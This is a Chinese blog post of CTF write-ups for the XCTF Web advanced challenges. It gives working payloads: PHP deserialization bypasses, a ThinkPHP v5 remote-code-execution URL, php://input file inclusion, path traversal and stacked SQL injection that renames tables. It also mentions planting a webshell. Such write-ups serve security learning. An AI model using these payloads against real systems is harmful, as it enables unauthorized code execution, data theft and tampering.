攻防世界Web进阶篇

网络安全 web 攻防世界 CTF
网络安全
发布日期:   2022-03-25
文章字数:   588
阅读次数:  

web进阶篇

baby_web

根据提示想到初始页面index.php,但是会一直跳转到1.php里,按f12打开index.php,在响应头里找到flag

image-20220121185934151

warmup

开局一张滑稽,查看源码找到source.php,代码审计,查看hint.php,提示flag在ffffllllaaaagggg,通过source.php?file=hint.php?../../../../../../ffffllllaaaagggg找到flag

image-20220121190910570

Training-WWW-Robots

没什么好说的,查看robots.txt文件找到fl0g.php

image-20220121191216837

php2

查看index.phps之后输入/index.php?id=%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65(对admin进行两次url编码)

image-20220121191517055

unserialize3

代码审计发现是反序列化,序列化一下就好

<?php

class xctf&#123;
public $flag = '111';
public function __wakeup()&#123;
exit('bad requests');
&#125;
&#125;
$a = new xctf("$code");
echo serialize($a);

?>

得到O:4:”xctf”:2:{s:4:”flag”;s:3:”111”;},提交获得flag

image-20220121192033277

Web_php_unserialize

将代码放入php中跑一下

<?php 
class Demo &#123; 
    private $file = 'index.php';
    public function __construct($file) &#123; 
        $this->file = $file; 
    &#125;
    function __destruct() &#123; 
        echo @highlight_file($this->file, true); 
    &#125;
    function __wakeup() &#123; 
        if ($this->file != 'index.php') &#123; 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        &#125; 
    &#125; 
&#125;
$a=new Demo("fl4g.php");
echo serialize($a);

echo base64_encode($b);
//echo base64_encode('O:+4:"Demo":2:&#123;s:10:"Demofile";s:8:"fl4g.php";&#125;');
if (isset($_GET['var'])) &#123; 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) &#123; 
        die('stop hacking!'); 
    &#125; else &#123;
        @unserialize($var); 
    &#125; 
&#125; else &#123; 
    highlight_file("index.php"); 
&#125; 
?>

先序列化,然后O:+4:”Demo”:2:{s:10:”%00Demo%00file”;s:8:”fl4g.php”;}%00在burp中urldecode之后再base64加密TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==得到flag

image-20220121192703117

php_rce

ThinkPHP v5的漏洞

exp

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

image-20220121193048851

Web_php_include

查看源码,使用伪协议,php://小写被屏蔽,切换大写

/?hello=xxxxx&page=Php://input

image-20220121193537722

supersqli
/?inject=1';show databases; --+
/?inject=1';show tables; --+

1919810931114514

words
/?inject=1';show columns from `words`; --+

words里面id data

1919810931114514里面flag
推断:

select id,data from `words` where id='$id'

rename tables `words` to `haha`;rename tables `1919810931114514` to `words`;alter table `words` change `flag` `id` varchar(100);--+
输出绝对正确的答案/?inject=1' or 1 --+

image-20220121194239602

ics-06

跑id,跑到2333出现flagimage-20220121194515141

NewsCenter

sql注入,单引号闭合,不屏蔽#,走流程,得到flagimage-20220121200149783

NaNNaNNaNNaN-Batman

暂时不写,下一个

upload1

文件上传,挂马,菜刀连,flag就不搞了

文章作者: Broken-year
文章链接: http://Broken-year.github.io/2022/03/25/gongfangshijie/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Broken-year !
网络安全 web 攻防世界 CTF
  目录